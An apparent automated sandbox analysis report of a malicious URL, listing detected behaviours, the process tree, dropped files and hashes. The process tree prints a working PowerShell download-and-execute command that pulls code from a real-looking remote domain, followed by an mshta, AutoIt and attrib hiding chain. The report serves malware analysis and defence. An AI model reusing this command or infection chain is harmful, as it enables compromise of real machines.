Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/05/2024, 18:39

General

  • Target

    https://lashakhazhalia86dancer.com/c.txt

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: AutoIT 1 TTPs 2 IoCs

    Using AutoIT for possible automate script.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 57 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://lashakhazhalia86dancer.com/c.txt
    1⤵
      PID:4972
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4148 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:1
      1⤵
        PID:4660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5044 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:1
        1⤵
          PID:3180
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4936 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:228
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5320 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:1
            1⤵
              PID:4064
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=3680 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
              1⤵
                PID:3112
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6044 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
                1⤵
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:1652
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5476 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
                1⤵
                  PID:4388
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=5812 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:1
                  1⤵
                    PID:912
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6320 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
                    1⤵
                      PID:4520
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                      1⤵
                      • Enumerates system info in registry
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:4820
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x25c,0x7ff89b692e98,0x7ff89b692ea4,0x7ff89b692eb0
                        2⤵
                          PID:1712
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2288 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:2
                          2⤵
                            PID:1428
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3268 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:3
                            2⤵
                              PID:1004
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3540 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:8
                              2⤵
                                PID:1620
                              • C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4252 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:8
                                2⤵
                                  PID:1960
                                • C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4252 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:8
                                  2⤵
                                    PID:1236
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4304 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:8
                                    2⤵
                                      PID:2120
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4624 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:8
                                      2⤵
                                        PID:1216
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3472 --field-trial-handle=2296,i,5253144690437369298,5780645760752880654,262144 --variations-seed-version /prefetch:8
                                        2⤵
                                          PID:3672
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\c.txt.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                        1⤵
                                        • Checks computer location settings
                                        PID:1692
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'languangjob.com/wogyusxs')
                                          2⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:388
                                          • C:\owsa\Autoit3.exe
                                            "C:\owsa\Autoit3.exe" script.a3x
                                            3⤵
                                            • Executes dropped EXE
                                            • Command and Scripting Interpreter: AutoIT
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4360
                                            • \??\c:\windows\SysWOW64\cmd.exe
                                              "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\hhdhchh\cgbhdbh
                                              4⤵
                                                PID:384
                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                  wmic ComputerSystem get domain
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2704
                                            • C:\Windows\SysWOW64\attrib.exe
                                              "C:\Windows\system32\attrib.exe" +h C:/owsa/
                                              3⤵
                                              • Views/modifies file attributes
                                              PID:4800
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\c.txt.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                          1⤵
                                          • Checks computer location settings
                                          PID:400
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'languangjob.com/wogyusxs')
                                            2⤵
                                            • Blocklisted process makes network request
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4712
                                            • C:\owsa\Autoit3.exe
                                              "C:\owsa\Autoit3.exe" script.a3x
                                              3⤵
                                              • Executes dropped EXE
                                              • Command and Scripting Interpreter: AutoIT
                                              • Checks processor information in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4068
                                            • C:\Windows\SysWOW64\attrib.exe
                                              "C:\Windows\system32\attrib.exe" +h C:/owsa/
                                              3⤵
                                              • Views/modifies file attributes
                                              PID:4772

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\ProgramData\hhdhchh\cgbhdbh

                                          Filesize

                                          54B

                                          MD5

                                          c8bbad190eaaa9755c8dfb1573984d81

                                          SHA1

                                          17ad91294403223fde66f687450545a2bad72af5

                                          SHA256

                                          7f136265128b7175fb67024a6ddd7524586b025725a878c07d76a9d8ad3dc2ac

                                          SHA512

                                          05f02cf90969b7b9a2de39eecdf810a1835325e7c83ffe81388c9866c6f79be6cdc8617f606a8fedc6affe6127bede4b143106a90289bbb9bf61d94c648059df

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                          MD5

                                          ccc5ea3b5b4c1187c772e5e8a3ade98e

                                          SHA1

                                          f786da6d795d38a3a34272adc64605af1b652b18

                                          SHA256

                                          1b2f79b27639c00bbdda4d2de4e974836b24ee661219ef01ed076d0901dbc90a

                                          SHA512

                                          df52ced592307eb357b2922f18bf74cacdd1f2ea7ae23f36da9a56da0d3db1ee81045e53cb223dcaf7c4cb085cd98cca64823819ee588240096e8998ed753c7e

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                          Filesize

                                          280B

                                          MD5

                                          f1a7c0ff1f1b07d114d616ae6ecfeaf4

                                          SHA1

                                          42a12a56e95e7ae9ff955778e47acb425c99be3f

                                          SHA256

                                          b2f2e071ad979e433842850ad8194badb0d7b46f4a4d5922db4f270b5b95ccf6

                                          SHA512

                                          1291aafefe7b28b54b268118c1c415d6435db7614c084c676a0d38629c6749117cb293517ce4c9f09fc4c16fc8d8dc92e827370c18b3a523b5176db988e27ab5

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                          Filesize

                                          2B

                                          MD5

                                          99914b932bd37a50b983c5e7c90ae93b

                                          SHA1

                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                          SHA256

                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                          SHA512

                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                          Filesize

                                          1KB

                                          MD5

                                          0cab0e1d37dd67eb341bca202d1c0e1e

                                          SHA1

                                          7e409d63716c4350b9d43c69547d8b7695b30e11

                                          SHA256

                                          25d53e0d4f22dc3fb05cbea0cb765f370a9c6b43ea893309cc0f85fc6ccaa448

                                          SHA512

                                          e166757e4c1b4ce24b89c12f9dcda9d7fc82a7d52e1d28484e088596f6a8752f60f54b01eefe41d6b2096f19a3ff0995085a9702f38ad5da2760a0efa38ee410

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                          Filesize

                                          2B

                                          MD5

                                          d751713988987e9331980363e24189ce

                                          SHA1

                                          97d170e1550eee4afc0af065b78cda302a97674c

                                          SHA256

                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                          SHA512

                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                          Filesize

                                          40B

                                          MD5

                                          20d4b8fa017a12a108c87f540836e250

                                          SHA1

                                          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                          SHA256

                                          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                          SHA512

                                          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                          Filesize

                                          11KB

                                          MD5

                                          34e7cc5596f95e6a766b6c0a72a81506

                                          SHA1

                                          f5b79449288a18fc275a966bb222c5a47a142852

                                          SHA256

                                          b3c8265a45bea9961e4adb2711527f76f0196c383b0147caba9321648a724fa0

                                          SHA512

                                          1f06f319468ce524e774f6c32ef8eabb89d1441d64deff382395bb80d4c3dac2abd463728fce936fb4086f5d424536ae0d101a7a4e5a451392b579fb3011ff60

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                          Filesize

                                          30KB

                                          MD5

                                          2a657e24c11c234e8cde5ebefc4b6d23

                                          SHA1

                                          14b30f8e21cb7c8412a3fb3cc553e055c82ac5b1

                                          SHA256

                                          fda30ec4124fb592117ce43f34549fd38590b64c30a9885f05b3df05156d150c

                                          SHA512

                                          1136adb59315dca42942c94a5912130c3537ed0a59e8515df9125df51c14db283ddc1c21a945defd45a98029442e7b0030d3051849f866765098ea57255569bc

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                          Filesize

                                          56KB

                                          MD5

                                          bd9f802eb28d37bb9cf4edf36b044185

                                          SHA1

                                          4f0df794b817ca570dd2bc9a0028973cdc5780b5

                                          SHA256

                                          9f66d58ac0c39831f799ceddf889250dc0d4670da672ce58e7bcc4f9edd6b090

                                          SHA512

                                          0ab5b11e10de863dde7170a38634e26497c5647c7de91a005d9d3b0ba9e08fd401879b43ba10966304453d8f0f56af421a10f86e2286f631ca6a8a02b8390431

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                          Filesize

                                          66KB

                                          MD5

                                          fc752fb237d2f2e08363060fa36ae104

                                          SHA1

                                          316a8db24abdc5b3a70577afea805ace0f976caf

                                          SHA256

                                          f99b951e3eca60892a814120bc20c97629768d8e038cb2ad38dc206e16f512ab

                                          SHA512

                                          d2b8bf26a10ac23e4813386a9477fef2fd5abf0df38f03270c88e56011f294e95734d75625cb5a434d053457cd69c71d9f1f5d42430323bda22c3ef9b8bbda54

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Filesize

                                          53KB

                                          MD5

                                          d4d8cef58818612769a698c291ca3b37

                                          SHA1

                                          54e0a6e0c08723157829cea009ec4fe30bea5c50

                                          SHA256

                                          98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

                                          SHA512

                                          f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          21KB

                                          MD5

                                          726d0dbdbe40e3175274fb3fd15d93a9

                                          SHA1

                                          6a6bd6a001a229114e263db1b2167557ec3b8c8b

                                          SHA256

                                          05e2481a309426d5aadd20043a5386dd1de247fc1e3a918a99d7aad64e612b3d

                                          SHA512

                                          e0274a7eaede9de965623b09b24342c57b705ae96d82ef253807207b860ef369f3d5a276a77ea0fad7d841bad3b6f86e0889b83b30168e4ddffd6c350eaad80a

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2aqyp0f.b0q.ps1

                                          Filesize

                                          60B

                                          MD5

                                          d17fe0a3f47be24a6453e9ef58c94641

                                          SHA1

                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                          SHA256

                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                          SHA512

                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        • C:\Users\Admin\AppData\Roaming\FDFbfDf

                                          Filesize

                                          32B

                                          MD5

                                          58d61cb1333fcbe1a7c197d5bd22aa13

                                          SHA1

                                          c29bb2d3699a0a08b4d5ed6c7b55c722c8339cfe

                                          SHA256

                                          50ea85c0aa3829ee28b0480f4116955e4aacc46f7bdfeb285d386b6f65700621

                                          SHA512

                                          9600ee17590abf287b8a0d2c924541e64804d9336565c45bc7c1a941749961bddf9e24709ecf6f1d9260d722262f302616e35fe83d2e4655f59114994617dabd

                                        • C:\owsa\Autoit3.exe

                                          Filesize

                                          872KB

                                          MD5

                                          c56b5f0201a3b3de53e561fe76912bfd

                                          SHA1

                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                          SHA256

                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                          SHA512

                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                        • C:\owsa\script.a3x

                                          Filesize

                                          547KB

                                          MD5

                                          77fd989ebd6cfc7b75b36474503c1ad6

                                          SHA1

                                          2cf50b3b481900635ffe63735bacdefacae8e85c

                                          SHA256

                                          b4accf076121e1074fa593d9a3c6925c59616c3e7abcbe524a3cec6fd36b682f

                                          SHA512

                                          58ef7e74c5d702177963b6d608ac0a7bcb5a661b7ca6e4925e961cfa41b1b1584155f6afffa77c576ca94d8c579336157072c296595fc1d8a92bb7a59d230f9e

                                        • memory/388-84-0x00000000056D0000-0x0000000005736000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/388-152-0x0000000008260000-0x0000000008274000-memory.dmp

                                          Filesize

                                          80KB

                                        • memory/388-100-0x0000000008290000-0x0000000008452000-memory.dmp

                                          Filesize

                                          1.8MB

                                        • memory/388-101-0x0000000008160000-0x00000000081F6000-memory.dmp

                                          Filesize

                                          600KB

                                        • memory/388-102-0x0000000007A10000-0x0000000007A32000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/388-103-0x0000000008A10000-0x0000000008FB4000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/388-118-0x00000000084E0000-0x0000000008512000-memory.dmp

                                          Filesize

                                          200KB

                                        • memory/388-119-0x0000000072B40000-0x0000000072B8C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/388-120-0x00000000719B0000-0x0000000071D04000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/388-130-0x00000000084C0000-0x00000000084DE000-memory.dmp

                                          Filesize

                                          120KB

                                        • memory/388-131-0x0000000008530000-0x00000000085D3000-memory.dmp

                                          Filesize

                                          652KB

                                        • memory/388-132-0x0000000008630000-0x000000000863A000-memory.dmp

                                          Filesize

                                          40KB

                                        • memory/388-133-0x0000000008650000-0x0000000008661000-memory.dmp

                                          Filesize

                                          68KB

                                        • memory/388-134-0x00000000079B0000-0x00000000079C2000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/388-135-0x00000000078F0000-0x00000000078FA000-memory.dmp

                                          Filesize

                                          40KB

                                        • memory/388-141-0x00000000719B0000-0x0000000071D04000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/388-151-0x0000000007980000-0x000000000798E000-memory.dmp

                                          Filesize

                                          56KB

                                        • memory/388-99-0x0000000006900000-0x000000000691A000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/388-153-0x0000000008750000-0x000000000876A000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/388-154-0x0000000008520000-0x0000000008528000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/388-98-0x0000000007A40000-0x00000000080BA000-memory.dmp

                                          Filesize

                                          6.5MB

                                        • memory/388-97-0x0000000006490000-0x00000000064DC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/388-96-0x0000000006410000-0x000000000642E000-memory.dmp

                                          Filesize

                                          120KB

                                        • memory/388-92-0x0000000005DE0000-0x0000000006134000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/388-81-0x0000000002DE0000-0x0000000002E16000-memory.dmp

                                          Filesize

                                          216KB

                                        • memory/388-85-0x0000000005D70000-0x0000000005DD6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/388-82-0x0000000005740000-0x0000000005D68000-memory.dmp

                                          Filesize

                                          6.2MB

                                        • memory/388-83-0x0000000005530000-0x0000000005552000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/4712-192-0x0000000006330000-0x000000000637C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4712-219-0x0000000070D70000-0x0000000070DBC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4712-220-0x0000000070F00000-0x0000000071254000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/4712-230-0x00000000080C0000-0x0000000008163000-memory.dmp

                                          Filesize

                                          652KB

                                        • memory/4712-231-0x00000000081C0000-0x00000000081D1000-memory.dmp

                                          Filesize

                                          68KB

                                        • memory/4712-233-0x0000000070F00000-0x0000000071254000-memory.dmp

                                          Filesize

                                          3.3MB

                                        • memory/4712-190-0x0000000005A20000-0x0000000005D74000-memory.dmp

                                          Filesize

                                          3.3MB